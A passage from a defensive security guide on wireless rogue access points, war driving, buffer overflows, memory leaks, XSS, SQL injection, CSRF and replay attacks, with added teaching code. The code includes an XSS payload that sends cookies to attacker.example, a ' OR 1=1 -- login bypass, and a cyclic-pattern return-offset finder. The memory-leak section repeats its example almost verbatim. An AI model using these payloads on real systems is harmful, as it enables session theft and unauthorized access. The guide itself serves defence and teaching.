the communication between two parties using RAPs, performing a
Man-in-the-Middle attack.

• Information Theft: By monitoring the traffic passing through a RAP,
attackers can steal sensitive information such as usernames,
passwords, and credit card information.

• Network Vulnerabilities: RAPs can create new security holes
because they often bypass security measures such as firewalls,
intrusion detection systems, and VPNs.

Detecting and Preventing Rogue Access Points

Here are some measures to help detect and prevent rogue access points:

• Wireless Intrusion Detection Systems (WIDS): A WIDS uses sensors
to identify and locate unauthorized access points, clients and ad-hoc
connections in an organization’s wireless network, and can correlate a
radio’s BSSID with MAC addresses seen on the wired side to tell an
on-premises rogue from a neighbour’s AP.

• Regular Network Scans: Perform regular wireless and wired network
scans to detect any unauthorized devices connected to the network.

• Network Access Control (NAC): Implement Network Access Control,
for example 802.1X on switch ports, so that an access point plugged
into a spare wall jack gets no network access.

• Encryption and Authentication: Apply strong encryption and
authentication protocols such as WPA3, to reduce the chances of
unauthorized devices connecting to the network.

• User Awareness: Educate employees about the risks associated with
rogue access points and how to avoid unintentionally installing them.

By staying vigilant and implementing robust security measures,
organizations can reduce the risks associated with rogue access points and
protect their networks from potential cyberattacks.
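The Evil Twin and Rogue Access Point sections above describe what a wireless intrusion detection system is looking for in a scan: the organization's own SSID coming from a radio it does not own, and strong unknown radios that are probably inside the building. The triage below is an added example, not from the original guide; the scan results, SSIDs, BSSIDs and the signal threshold are constructed assumptions, where a real WIDS takes the scan from its sensors and the authorized list from the wireless controller.

```python
"""Triage access points from a scan: authorized, evil twin, rogue candidate, or external.

Added example, not from the original guide. Scan entries, SSIDs, BSSIDs and the
signal threshold are constructed assumptions.
"""
CORP_SSIDS = {"CorpWiFi", "CorpGuest"}
AUTHORIZED_BSSIDS = {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"}
KNOWN_NEIGHBORS = {"11:22:33:44:55:66"}       # the cafe next door, verified once
STRONG_SIGNAL_DBM = -60                       # louder than this: probably inside our walls

# Constructed scan: (ssid, bssid, security, rssi_dbm)
SAMPLE_SCAN = [
    ("CorpWiFi", "aa:bb:cc:00:00:01", "WPA2-Enterprise", -55),
    ("CorpGuest", "aa:bb:cc:00:00:02", "WPA2-PSK", -58),
    ("CorpWiFi", "de:ad:be:ef:00:01", "OPEN", -40),             # evil twin, left open
    ("CorpWiFi", "de:ad:be:ef:00:02", "WPA2-Enterprise", -45),  # evil twin, same security
    ("CoffeeShop", "11:22:33:44:55:66", "WPA2-PSK", -80),       # known neighbor
    ("Printer-Setup", "66:55:44:33:22:11", "OPEN", -38),        # unknown and strong
    ("Linksys", "77:88:99:aa:bb:cc", "WPA2-PSK", -85),          # unknown and weak
]


def classify_ap(ssid, bssid, security, rssi):
    bssid = bssid.lower()
    if bssid in AUTHORIZED_BSSIDS:
        return "authorized"
    if ssid in CORP_SSIDS:
        # Our network name from a radio we do not own: the evil-twin signature.
        # Security settings do not matter; a twin with matching settings is the
        # dangerous one, since clients cannot tell it apart without 802.1X
        # server-certificate validation.
        return "evil_twin"
    if bssid in KNOWN_NEIGHBORS:
        return "neighbor"
    if rssi > STRONG_SIGNAL_DBM:
        # Strong unknown radio: likely on-premises, possibly plugged into our LAN.
        return "rogue_candidate"
    return "external"


def triage(scan):
    """Group BSSIDs by classification, preserving scan order."""
    out = {}
    for ssid, bssid, security, rssi in scan:
        out.setdefault(classify_ap(ssid, bssid, security, rssi), []).append(bssid.lower())
    return out


if __name__ == "__main__":
    for category, bssids in triage(SAMPLE_SCAN).items():
        print(f"{category:16s} {bssids}")
```

A rogue candidate is confirmed, not assumed: the follow-up is to look for its MAC (or a neighbouring address, since many APs number their wired and wireless interfaces consecutively) in the switch MAC address tables, which is what separates a device on the corporate LAN from a strong signal bleeding through the wall.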

War-driving/dialing

War Driving

War driving is a technique in which an attacker physically drives around
attempting to discover open or poorly secured wireless networks. This
practice allows the attacker to exploit network vulnerabilities and gain
unauthorized access to sensitive information. The goal of war driving is to
identify targets, typically homes, offices, or businesses, with WLANs.

Key elements of War Driving

• Detection: War driving begins with the detection of nearby wireless
access points using laptops, mobile devices, or any device with WiFi
scanning capabilities.

• Mapping: After detecting the wireless signals, the attacker maps them
using GPS or other location-based services.

• Analysis: Once the target is identified, the attacker analyzes the
network security to find the weaknesses and vulnerabilities.

• Exploitation: Finally, the attacker exploits the discovered
vulnerabilities to gain unauthorized access to the network.

War Dialing

War dialing is a similar attack method but involves calling numerous phone
lines in search of modems and fax machines. War dialing allows the attacker
to identify insecure phone lines and unauthorized access points.

Key elements of War Dialing

• Detection: War dialing starts by automating the process of calling a
range of phone numbers using software, searching for modem or fax
machine tones.

• Mapping: The attacker collects the list of phone numbers that
responded with an appropriate connection tone.

• Analysis: The attacker will analyze the phone lines to assess their
security and vulnerabilities.

• Exploitation: The attacker exploits the discovered vulnerabilities to
gain unauthorized access to the systems connected to the modems or
fax machines.

Prevention Strategies

To protect your network against war driving or war dialing, it’s important to:

• Implement strong security measures such as WPA3 or WPA2-Enterprise
for WiFi networks; open and WEP networks are exactly what war driving
looks for.

• Employ proper firewall configurations.

• Do not rely on hiding the SSID: disabling the SSID broadcast only
removes the name from casual scans. War-driving tools still record the
network from client probe and data frames, so it may deter passersby
but is not a security control.

• Use strong authentication methods for remote access systems, and
retire or firewall any dial-in modems that are still connected.

• Regularly update your network devices with the latest security
patches.

• Periodically conduct vulnerability assessments to stay ahead of
potential weaknesses.

• Educate employees and users about the risks of unsecured networks
and the importance of following security guidelines.

Buffer Overflow
A buffer overflow is a common type of software vulnerability that occurs
when a program writes more data into a fixed-size buffer than it can hold
(or reads past its end), so that the excess spills into adjacent memory.
The overflow can corrupt neighbouring variables, heap metadata, or saved
return addresses and lead to unexpected behavior, from application
crashes to the execution of attacker-supplied code.

Causes of Buffer Overflow

Buffer overflow vulnerabilities are usually caused by:

• Insufficient input validation: The program doesn’t check the
length of the input before writing it into the buffer, for example by
using strcpy or gets instead of a length-bounded copy.

• Off-by-one errors: The code uses an incorrect boundary condition
(such as <= instead of <), leading to one extra byte being written
outside the buffer.

• Integer overflows: The buffer size or copy length is computed with
arithmetic that wraps around (or mixes signed and unsigned values), so
the allocation ends up smaller than the amount of data later written.

Exploitation

Attackers can exploit buffer overflow vulnerabilities to:

• Crash the application, causing a denial of service (DoS).

• Overwrite critical data or control structures, causing the application to
behave unexpectedly.

• Inject and execute malicious code, compromising the security of the
system.
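The third item, redirecting execution, starts with a measurement: how many bytes past the buffer does the saved return address sit? Exploit developers answer that with a cyclic pattern in which every four-byte window is unique, so the value found in the instruction pointer after the crash can be looked up to give the offset. The code below is an added example, not from the original guide. The stack frame is a toy model in Python (a 64-byte buffer, a 4-byte saved frame pointer and a 4-byte return address, as on a 32-bit stack) so the arithmetic can be run here; the pattern technique itself is the one used against real crashes (Metasploit's pattern_create and pattern_offset use the same alphabet). Sizes are assumptions.

```python
"""Locate the return-address offset in a stack overflow with a cyclic pattern.

Added example, not from the original guide. The stack frame is a toy model;
the pattern is the standard upper/lower/digit cyclic pattern. Sizes are assumptions.
"""
import string

BUF_SIZE, SAVED_FP, RET_SIZE = 64, 4, 4


def pattern_create(length):
    """Pattern in which every 4-byte window is unique (valid up to 20280 bytes)."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("a pattern longer than 20280 bytes is no longer unique")


def pattern_offset(pattern, value):
    """Offset of a crash value inside the pattern, or -1 if absent.
    `value` is either the 4 bytes found in a register or the register as an
    integer (little-endian, as on x86)."""
    needle = value.to_bytes(4, "little") if isinstance(value, int) else bytes(value)
    return pattern.find(needle)


def vulnerable_copy(data):
    """Toy model of `char buf[64]; strcpy(buf, data);` on a 32-bit stack.
    Frame layout, low to high address: buffer, saved frame pointer, return address.
    The copy has no bounds check, so long input runs into the saved slots.
    Returns the value now sitting in the return-address slot, as an integer."""
    frame = bytearray(BUF_SIZE + SAVED_FP + RET_SIZE)
    frame[:len(data)] = data                                 # the overflow
    start = BUF_SIZE + SAVED_FP
    return int.from_bytes(frame[start:start + RET_SIZE], "little")


def find_return_offset(max_len=200):
    """The exploit developer's loop: send a pattern, read the faulting instruction
    pointer from the crash, look it up in the pattern."""
    pattern = pattern_create(max_len)
    crashed_eip = vulnerable_copy(pattern)
    return pattern_offset(pattern, crashed_eip)


if __name__ == "__main__":
    offset = find_return_offset()
    print("return address overwritten at offset", offset)          # 68
    controlled = vulnerable_copy(b"A" * offset + (0xDEADBEEF).to_bytes(4, "little"))
    print(hex(controlled))                                        # 0xdeadbeef
```

Stack canaries break exactly this step: the canary sits between the buffer and the saved frame pointer, and the write that reaches the return address also changes the canary, so the process aborts before the corrupted address is ever used. ASLR then makes the value to place at the offset unknown, which is why both are listed under prevention.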

Prevention Techniques

To prevent and mitigate buffer overflow vulnerabilities, the following
strategies can be employed:

• Perform thorough input validation and enforce length limits on all
inputs to the program.

• Use safe APIs and libraries that take an explicit size (such as
snprintf or strlcpy rather than sprintf and strcpy) and check it before
copying into the buffer.

• Apply proper bounds checks, and prefer memory-safe languages (such as
Rust, Go, Java, or Python) where performance and platform constraints
allow.

• Enable compiler and platform protections such as stack canaries,
non-executable stacks (NX/DEP), and address space layout randomization
(ASLR); these do not remove the bug but make it much harder to exploit.

• Regularly scan code for vulnerabilities (fuzzing and sanitizers such
as AddressSanitizer find many overflows) and conduct security audits.

By being aware of buffer overflow vulnerabilities and implementing these
preventive strategies, you can protect your software from potential attacks
and keep your systems secure.

Memory Leak
A memory leak occurs when a program or application allocates memory but
fails to release it back to the system when it is no longer needed. The
unused memory accumulates, and as the available memory is exhausted the
system’s performance degrades or the program crashes. The security
relevance is that an attacker who can trigger a leaking code path
repeatedly (for example with crafted requests) can exhaust memory on
purpose and cause a denial of service.

Causes of Memory Leaks

Memory leaks can occur due to various reasons such as:

• Programming Errors: Memory leaks mainly result from errors in the
program’s source code, such as improper handling or deallocation of
memory resources.

• Library or Framework Bugs: Sometimes, the libraries or
frameworks used by an application may contain memory leaks within
their implementation.

• Operating System or Hardware Bugs: Certain bugs in the
operating system or hardware may also cause memory leaks.

Effects of Memory Leaks

Memory leaks can have several negative consequences on system
performance and stability, including:

• Performance Degradation: As the system runs out of available
memory, it may become slow and unresponsive, leading to a poor user
experience.

• System Crashes: In extreme situations, a memory leak may cause
the system to run out of memory altogether, forcing it to crash or
reboot.

• Resource Exhaustion: Applications suffering from memory leaks
may lead to a gradual depletion of system resources, which can then
impact the performance of other applications running on the same
system.

Detecting Memory Leaks

There are several techniques to detect memory leaks:

• Static Code Analysis: This method involves analyzing the source
code of an application to identify any potential memory leak issues.

• Runtime Analysis: Runtime analysis tools, also known as memory
profilers, can monitor an application’s memory usage during execution
and identify leaks in real-time.

• Testing & Monitoring: Rigorous testing and continuous monitoring of
applications can help detect memory leaks as well as performance
issues due to resource contention or exhaustion.
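Runtime analysis, the second technique above, reduces to one measurement: does net allocation keep growing across repeated rounds of the same work? The code below is an added example, not from the original guide, using Python's standard tracemalloc profiler on a constructed request handler that caches per-request data and never evicts it, beside a bounded version. The handler, the request sizes and the growth thresholds are assumptions for illustration; the point carries over to any garbage-collected language, since the leak here is a reference the collector cannot know is dead.

```python
"""Detect a memory leak by measuring allocation growth across repeated rounds.

Added example, not from the original guide. The handlers, request sizes and
thresholds are assumptions; tracemalloc is Python's standard allocation tracer.
"""
import tracemalloc

_request_cache = {}          # module-level store that is never pruned: the leak


def handle_request(request_id, payload):
    """Leaking handler: every request's payload is kept forever."""
    _request_cache[request_id] = payload
    return len(payload)


def handle_request_fixed(request_id, payload, cache, max_entries=100):
    """Bounded handler: same cache, but the oldest entry is evicted past max_entries."""
    cache[request_id] = payload
    if len(cache) > max_entries:
        cache.pop(next(iter(cache)))     # dicts preserve insertion order: FIFO eviction
    return len(payload)


def measure_growth(handler, rounds=3, per_round=500, payload_bytes=1024):
    """Run `rounds` identical batches of requests and return the net bytes allocated
    per round, as a memory profiler's snapshot diff would report them."""
    tracemalloc.start()
    try:
        growth = []
        before = tracemalloc.take_snapshot()
        for r in range(rounds):
            for i in range(per_round):
                handler(f"req-{r}-{i}", b"x" * payload_bytes)
            after = tracemalloc.take_snapshot()
            diff = after.compare_to(before, "filename")
            growth.append(sum(stat.size_diff for stat in diff))
            before = after
        return growth
    finally:
        tracemalloc.stop()


def is_leaking(growth, min_bytes=100_000):
    """A leak shows as growth on every round, not just a warm-up on the first."""
    return all(g > min_bytes for g in growth)


if __name__ == "__main__":
    leaky = measure_growth(handle_request)
    print("leaking handler, bytes per round:", leaky, "->", is_leaking(leaky))
    bounded = {}
    fixed = measure_growth(lambda rid, p: handle_request_fixed(rid, p, bounded))
    print("bounded handler, bytes per round:", fixed, "->", is_leaking(fixed))
```

The bounded handler still grows on the first round (the cache filling to its limit) and then flattens; the leaking one grows by roughly the same half-megabyte every round. That "warm-up then flat" versus "linear forever" shape is the signal to look for in production memory graphs, and the leaking version is also what an attacker would drive with a stream of cheap requests.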

Preventing Memory Leaks

To mitigate the risk of memory leaks:

• Follow Best Practices: By following coding best practices and guidelines, developers can minimize the occurrence of memory leaks in their applications. In C and C++ that means giving every allocation a clear owner responsible for freeing it (RAII and smart pointers in C++) and freeing on every exit path, error paths included.

• Code Reviews: Regularly reviewing the code for potential memory management issues can help identify and fix memory leaks early in the development process.

• Utilize Garbage Collection: Choosing programming languages or frameworks that support automatic garbage collection removes the class of leaks caused by forgetting to free memory. It does not remove leaks caused by keeping objects reachable after they are no longer needed (unbounded caches, listeners that are never unregistered, global registries): the collector cannot free what the program still references, so these must still be found with profiling and fixed in the code.

Always remember, addressing memory leaks promptly is crucial in maintaining a secure and efficient computing environment.
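The garbage-collection point above needs a caveat, and the runtime-analysis point is easier to believe with a measurement. What follows is an added example, not code from the original document: a request handler in a garbage-collected language that leaks anyway, because a cache it keeps holds every request’s payload reachable, beside a bounded variant, with Python’s standard tracemalloc profiler measuring how much heap each one retains. The handler names, the request count and the 1 KiB payloads are assumptions chosen for the demonstration.

```python
import tracemalloc
from collections import OrderedDict


def leaky_handler():
    """Handler whose per-request cache is never evicted. Every payload stays
    reachable, so the garbage collector can never free it (a logical leak)."""
    cache = {}

    def handle(request_id, payload):
        cache[request_id] = payload          # grows without bound
        return len(cache)

    return handle


def bounded_handler(max_entries=64):
    """Same handler with an LRU bound: old entries become unreachable and are
    reclaimed, so memory stays flat regardless of request volume."""
    cache = OrderedDict()

    def handle(request_id, payload):
        cache[request_id] = payload
        cache.move_to_end(request_id)
        if len(cache) > max_entries:
            cache.popitem(last=False)        # evict the least recently used entry
        return len(cache)

    return handle


def measure_growth(handler, requests=2000, payload_size=1024):
    """Runtime analysis: drive the handler with constructed requests and report
    how many bytes of traced heap remain allocated afterwards."""
    tracemalloc.start()
    try:
        before, _ = tracemalloc.get_traced_memory()
        for i in range(requests):
            handler(f"req-{i}", b"x" * payload_size)   # constructed 1 KiB payload
        after, _ = tracemalloc.get_traced_memory()
    finally:
        tracemalloc.stop()
    return after - before


if __name__ == "__main__":
    print("leaky  :", measure_growth(leaky_handler()), "bytes retained")
    print("bounded:", measure_growth(bounded_handler()), "bytes retained")
```

Run it and the leaky handler retains on the order of two megabytes after 2,000 requests while the bounded one stays under a hundred kilobytes; the collector frees nothing for the first one because the cache still references every object. On a server, a leak like this is triggered by whoever sends the requests, which is the denial-of-service angle discussed under Resource Exhaustion.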

XSS
Cross-site scripting (XSS) is a type of cybersecurity vulnerability commonly found in web applications. It occurs when an application includes attacker-controlled data in a page without encoding it for the context it lands in, so that another user’s browser executes it as script. Because the script runs in the application’s own origin, it can read session cookies and page content, send requests with the victim’s credentials, and rewrite the page. XSS vulnerabilities can therefore lead to account takeover, credential phishing from a trusted domain, and other malicious activities.

There are three main types of XSS attacks:

• Stored XSS Attacks: In this type, the malicious script is stored on the web server, typically through user input fields like comments or posts. When other users visit the affected page, their browsers will execute the malicious script.

• Reflected XSS Attacks: Here, the attacker sends a malicious URL containing the script to unsuspecting users. The server copies the parameter straight into its response, and when the users click the link, their browsers execute the malicious script, which can steal sensitive information or perform unauthorized actions.

• DOM-based XSS Attacks: In these cases, the vulnerability is in client-side JavaScript that takes attacker-controlled data (for example from location.hash or a URL parameter) and writes it into the page through a sink such as innerHTML or document.write. The payload may never reach the server at all, so server-side filtering does not see it and the fix has to be made in the client-side code.

Preventing XSS Attacks

To protect your web applications from XSS attacks, consider implementing the following best practices:

• Input Validation: Validate user inputs against what each field is expected to contain (type, length, character set, allowed values) and reject the rest. Treat this as defense in depth rather than the primary control: many fields legitimately contain characters such as < or ', and trying to recognise "malicious code" with a blocklist is unreliable.

• Output Encoding: Encode data at the point where it is written into the page, using the encoding for that context: HTML entity encoding for element content and quoted attributes, URL encoding for values placed in URLs, and JavaScript string escaping for values placed inside scripts. This is the primary defense, because special characters are then displayed literally instead of being parsed as markup or code.

• Content Security Policy (CSP): Implement a strict CSP, which serves as a layer of defense against XSS by specifying the sources of allowed scripts and other file types that can be executed by the browser. A nonce- or hash-based script-src without 'unsafe-inline' blocks injected inline scripts even when an encoding mistake slips through.

• Secure HTTP Headers: Set X-Content-Type-Options: nosniff (so the browser does not reinterpret a response as script) and X-Frame-Options or the CSP frame-ancestors directive (against clickjacking). X-XSS-Protection controlled a browser-side filter that modern browsers have removed and that could itself be abused where it remained; OWASP now recommends setting it to 0 and relying on CSP. X-Content-Security-Policy was an early vendor-prefixed form of the header; the standard header is Content-Security-Policy.

• Regular Security Testing: Perform regular security audits and penetration tests to identify and fix any vulnerabilities in your web applications.

Remember, XSS vulnerabilities pose a significant risk to user privacy and web application security. By following these best practices, you can build a robust defense against cross-site scripting attacks and keep your users’ sensitive data protected.
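The output-encoding and CSP points above are concrete enough to show in code. The following is an added example, not code from the original document: a server-side render of a user comment with and without encoding, the same encoding applied in an attribute context and in a JavaScript-string context, and a nonce-based CSP header. The payloads and the function names are constructed for the demonstration; DOM-based XSS needs the client-side equivalent (writing to textContent rather than innerHTML), which this server-side example does not cover.

```python
import html
import json
import secrets

# Constructed attacker inputs, one per output context.
CONSTRUCTED_PAYLOADS = {
    "element": "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>",
    "attribute": '" autofocus onfocus="alert(1)',
    "script": "</script><script>alert(1)</script>",
}


def render_comment_unsafe(comment):
    """Vulnerable: user data is concatenated straight into HTML, so the browser
    parses the payload as markup (stored or reflected XSS depending on where
    `comment` came from)."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment):
    """Element-content context: entity-encode &, <, > and quotes."""
    return f'<p class="comment">{html.escape(comment)}</p>'


def render_attribute_safe(value):
    """Quoted-attribute context: the same encoding is enough only because the
    attribute is quoted; an unquoted attribute can be broken out of with a space."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def render_script_data_safe(value):
    """JavaScript-string context: emit the value as a JSON literal and also
    escape '<', so a '</script>' inside the data cannot terminate the script."""
    literal = json.dumps(value).replace("<", "\\u003c")
    return f"<script>var q = {literal};</script>"


def new_nonce():
    """Fresh per-response nonce; must not be reused across responses."""
    return secrets.token_urlsafe(16)


def csp_header_for(nonce):
    """Strict CSP: only <script nonce=...> elements the server emitted may run,
    so an injected inline script is blocked even if encoding was missed."""
    return (f"default-src 'self'; script-src 'nonce-{nonce}' 'strict-dynamic'; "
            "object-src 'none'; base-uri 'none'")


if __name__ == "__main__":
    p = CONSTRUCTED_PAYLOADS
    print(render_comment_unsafe(p["element"]))
    print(render_comment_safe(p["element"]))
    print(render_attribute_safe(p["attribute"]))
    print(render_script_data_safe(p["script"]))
    print("Content-Security-Policy:", csp_header_for(new_nonce()))
```

The point to take from the three safe renderers is that the encoding depends on where the value lands: html.escape is right for element content and quoted attributes, wrong on its own inside a script block, where the closing tag must also be neutralised.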

SQL Injection
SQL Injection is a type of cyber attack that targets web applications and the databases behind them. It arises when an application builds SQL statements by concatenating untrusted input into the query text, so that input containing SQL syntax changes the meaning of the statement instead of being treated as data. Attackers can use this technique to retrieve, modify, delete, or even add data to the database without proper authorization.

How SQL Injection Works

SQL Injection works by identifying input fields in a web application, such as text boxes or URL parameters, and testing whether these fields are vulnerable to SQL code injection. When an attacker identifies a vulnerable input field, they inject SQL code to manipulate the underlying SQL query or to execute additional queries on the database.

For example, consider a web application that allows users to log in by providing a username and password. The application might use the following SQL query to authenticate the user:
SELECT * FROM users WHERE username = '$username' AND password = '$password'

In this case, $username and $password are replaced with the values
provided by the user. If an attacker enters the following input for the
username field, they can manipulate the query to bypass the password
check:

' OR 1=1 --

The resulting query would look like:

SELECT * FROM users WHERE username = '' OR 1=1 -- ' AND password = '$password'

The -- starts a comment, so everything after it, including the password check, is ignored. As 1=1 is true for every row, the query returns every user; an application that takes the first row as the authenticated user then logs the attacker in as whichever account comes first, often the first account created, such as an administrator.

Preventing SQL Injection Attacks

To protect your web applications from SQL Injection attacks, you should:

• Use Parameterized Queries and Prepared Statements: These techniques send the SQL text and the user-supplied values to the database separately, so a value is never parsed as part of the statement, however many quotes or comment markers it contains. This is the fix, not a mitigation. Most modern web development frameworks and database libraries support parameterized queries and prepared statements; raw-query helpers in ORMs and query builders still need the same care.

• Validate User Input: Always validate user input before incorporating it into a SQL query. Use strict data types (an integer id is parsed as an integer, never interpolated as text) and validate input against predefined patterns or value ranges. Validation is defense in depth alongside parameterization, not a substitute for it.

• Limit Database Permissions: Limit the privileges of the database accounts used by your web applications. An application that only reads catalog data should connect with an account that can only read those tables, and nothing should connect as the database administrator. This confines the potential damage if an attacker manages to perform an SQL injection attack.

• Keep Software Up-to-Date: Regularly update your web application software and database management systems to ensure that you are protected against known vulnerabilities.

By understanding SQL Injection attacks and employing the best practices to prevent them, you can safeguard your web applications and secure your sensitive data from malicious actors.
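The login query from the text, run both ways against a real database engine, makes the difference between interpolation and parameterization concrete. This is an added example, not code from the original document: the users table, its two accounts and the function names are constructed for the demonstration, and SQLite stands in for whatever database a production application uses. Passwords are stored as an unsalted SHA-256 purely to keep the example short, which is not a recommendation.

```python
import hashlib
import re
import sqlite3

# The payload from the text above, typed into the username field.
ATTACKER_USERNAME = "' OR 1=1 --"


def _digest(password):
    # Unsalted SHA-256 only to keep the example short; real systems use a slow,
    # salted password hash (bcrypt, scrypt, Argon2). Not the point of this example.
    return hashlib.sha256(password.encode()).hexdigest()


def build_demo_db():
    """In-memory SQLite database with a constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", _digest("correct horse")), ("alice", _digest("battery staple"))])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string interpolation, the pattern from the text.
    Returns the username the application would consider logged in."""
    query = (f"SELECT id, username FROM users WHERE username = '{username}' "
             f"AND password = '{_digest(password)}'")
    row = conn.execute(query).fetchone()   # '--' comments out the password check
    return row[1] if row else None


def login_safe(conn, username, password):
    """Parameterised query: the driver sends the values separately from the SQL
    text, so the payload is compared as a literal username and matches nothing."""
    row = conn.execute(
        "SELECT id, username FROM users WHERE username = ? AND password = ?",
        (username, _digest(password)),
    ).fetchone()
    return row[1] if row else None


def valid_username(value):
    """Defence in depth: an allow-list for the field's legitimate shape."""
    return re.fullmatch(r"[A-Za-z0-9_.-]{1,32}", value) is not None


if __name__ == "__main__":
    db = build_demo_db()
    print("vulnerable:", login_vulnerable(db, ATTACKER_USERNAME, "anything"))  # admin
    print("safe      :", login_safe(db, ATTACKER_USERNAME, "anything"))        # None
```

With the interpolated query the attacker is logged in as admin, the first row in the table, without knowing any password; with the parameterized query the same input is simply a username nobody has.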

CSRF
Cross-Site Request Forgery, or CSRF, is a type of attack that exploits the trust a web application places in the user’s browser. Because the browser attaches the application’s cookies to every request it sends to that site, including requests that a page from another site caused it to make, a malicious page can make the browser perform state-changing actions on a web application in which the user is currently authenticated.

How CSRF Works

• A user logs into a vulnerable web application.

• The web application returns a session cookie to the user’s browser, indicating that the user is authenticated.

• The attacker creates a malicious link or embeds malicious HTML/JavaScript code on another website, for example an image tag or an auto-submitting form whose target is a state-changing URL on the vulnerable application.

• The user, while still authenticated to the web application, visits the attacker’s website, which triggers the malicious code.

• The attacker’s code makes the browser send a request to the targeted web application; the browser attaches the user’s session cookie automatically.

• The vulnerable web application performs the action as if the request came from the user, because nothing in the request distinguishes it from one the user initiated.

Impact of CSRF Attacks

CSRF attacks can result in unauthorized actions being performed on a user’s behalf, often without the user’s knowledge. Consequences might include unauthorized:

• Data modifications

• Privilege escalation (for example, adding the attacker to an administrator group)

• Account takeovers (for example, changing the e-mail address used for password recovery)

Prevention Measures

Here are some techniques to help prevent CSRF attacks:

• Use CSRF Tokens: Include a unique, unpredictable token tied to the user’s session in each state-changing request (e.g., as a hidden form field or a request header) and verify it on the server. A page served by another origin cannot read this token because of the same-origin policy, so a forged request will not carry the correct value.

• Double-submit Cookies: Set a random token in a cookie and require the same value to be sent again in the request body or a header; the server compares the two. The attacker’s page can make the browser send the cookie but cannot read it, so it cannot supply the matching copy. Sign the token with a server-side key or bind it to the session, so that an attacker who can set cookies for the site (for example from a compromised subdomain) cannot plant a matching pair.

• SameSite Cookies: Set the SameSite attribute on the session cookie so that the browser does not attach it to cross-site requests. SameSite=Lax, which Chromium-based browsers apply by default when the attribute is absent, still sends the cookie on top-level GET navigations, so state-changing actions must not be reachable via GET; SameSite=Strict withholds it on all cross-site requests.

• Content Security Policy (CSP): Implement a CSP header to mitigate cross-site scripting. An XSS flaw in the application defeats every CSRF defense, because script running in the application’s own origin can read the token and make the request itself.

• Restrict CORS: Limit Cross-Origin Resource Sharing (CORS) to trusted origins and never reflect arbitrary origins together with Access-Control-Allow-Credentials. Note that CORS does not stop the browser from sending a simple cross-site form POST with cookies: a permissive CORS policy makes matters worse by letting the attacker’s script read responses and send custom requests, but a strict one is not on its own a CSRF defense.

By understanding and applying these preventive measures, the risk of CSRF attacks can be significantly reduced, enhancing the overall safety and security of web applications.
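The token check, seen from the server’s side, is short enough to show in full. The following is an added example, not code from the original document: a synchronizer token derived from the session under a server-only key, the form that carries it, the handler that verifies it, and two constructed requests, one from the real form and one from an attacker’s auto-submitting form, which arrives with the cookie but without the token. The dictionary shape of the requests, the server key and the function names are assumptions for the demonstration.

```python
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)   # assumption: a key known only to the server


def issue_csrf_token(session_id):
    """Synchroniser token derived from the session: unique per session,
    unpredictable without the server key, and needing no server-side storage."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def render_transfer_form(session_id):
    """The legitimate page carries the token in a hidden field. A page on
    attacker.example cannot read it: the same-origin policy stops it reading our
    HTML, and the token is not in a cookie the browser would send on its own."""
    return ('<form method="POST" action="/transfer">'
            f'<input type="hidden" name="csrf_token" value="{issue_csrf_token(session_id)}">'
            '<input name="to"><input name="amount"><button>Send</button></form>')


def handle_transfer(request):
    """Server-side check. The request must carry the session cookie AND a token
    matching that session; a forged cross-site request has the cookie (the browser
    attaches it automatically) but not the token."""
    session_id = request["cookies"].get("session")
    if session_id is None:
        return 401, "not authenticated"
    submitted = request["form"].get("csrf_token", "")
    expected = issue_csrf_token(session_id)
    if not hmac.compare_digest(submitted.encode(), expected.encode()):   # constant time
        return 403, "CSRF token missing or invalid"
    return 200, f"transferred {request['form']['amount']} to {request['form']['to']}"


def session_cookie_header(session_id):
    """Defence in depth: SameSite=Lax stops the browser attaching the cookie to
    cross-site POSTs; Strict also withholds it on cross-site top-level GETs."""
    return f"Set-Cookie: session={session_id}; Secure; HttpOnly; SameSite=Lax; Path=/"


# Constructed requests as the server would see them (assumed dict shape).
def legitimate_request(session_id):
    """Submission of the real form: cookie plus the token the page embedded."""
    return {"cookies": {"session": session_id},
            "form": {"csrf_token": issue_csrf_token(session_id), "to": "alice", "amount": "10"}}


def forged_request(session_id):
    """Auto-submitted form on the attacker's site: the browser adds the cookie,
    but the attacker has no way to learn the token."""
    return {"cookies": {"session": session_id},
            "form": {"to": "attacker", "amount": "1000"}}


if __name__ == "__main__":
    print(session_cookie_header("s1"))
    print(handle_transfer(legitimate_request("s1")))   # (200, ...)
    print(handle_transfer(forged_request("s1")))       # (403, ...)
```

The forged request fails on the token even though the cookie is present and valid, which is exactly the distinction a CSRF defense has to make; the SameSite attribute on the cookie would have stopped the cross-site POST before the handler ran at all.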

Replay Attack
A Replay Attack is a malicious action where an attacker intercepts data transmitted between two parties, records the data, and retransmits it at a later time to gain unauthorized access or some other benefit. The attacker does not need to alter or even understand the data: the message is simply replayed, and a system that cannot tell a fresh message from an old one treats it as a legitimate request.

How Does a Replay Attack Work?

Replay attacks work by the following process:

• The attacker intercepts communication between two parties (e.g., a user authenticating with a server).

• The attacker records the intercepted data, such as login credentials or session tokens.

• The attacker retransmits the recorded data to the target system at a later time, fooling the system into thinking that it is a legitimate request from the original sender.

Risks and Consequences

Some potential risks and consequences of replay attacks include:

• Unauthorized access: An attacker can gain access to the target system using replayed credentials or session tokens.

• Data theft: The attacker may steal sensitive data by impersonating a legitimate user.

• Financial fraud: In the case of online transactions, an attacker could potentially replay a transaction, causing the victim to pay for the same item or service multiple times.

Prevention Techniques

To prevent replay attacks, consider the following measures:

• Timestamps: Include a timestamp in the data being transmitted, and have the receiving system verify that it is receiving the request within a pre-determined time window. This requires reasonably synchronized clocks and still leaves a window in which a capture can be replayed, so it is normally combined with a nonce.

• Nonces: Use a unique, one-time number (nonce) in each transmitted message. The receiving party should check for duplicate nonces to ensure that the message has not been replayed; pairing the nonce with a timestamp lets the receiver forget nonces older than the window instead of storing them forever.

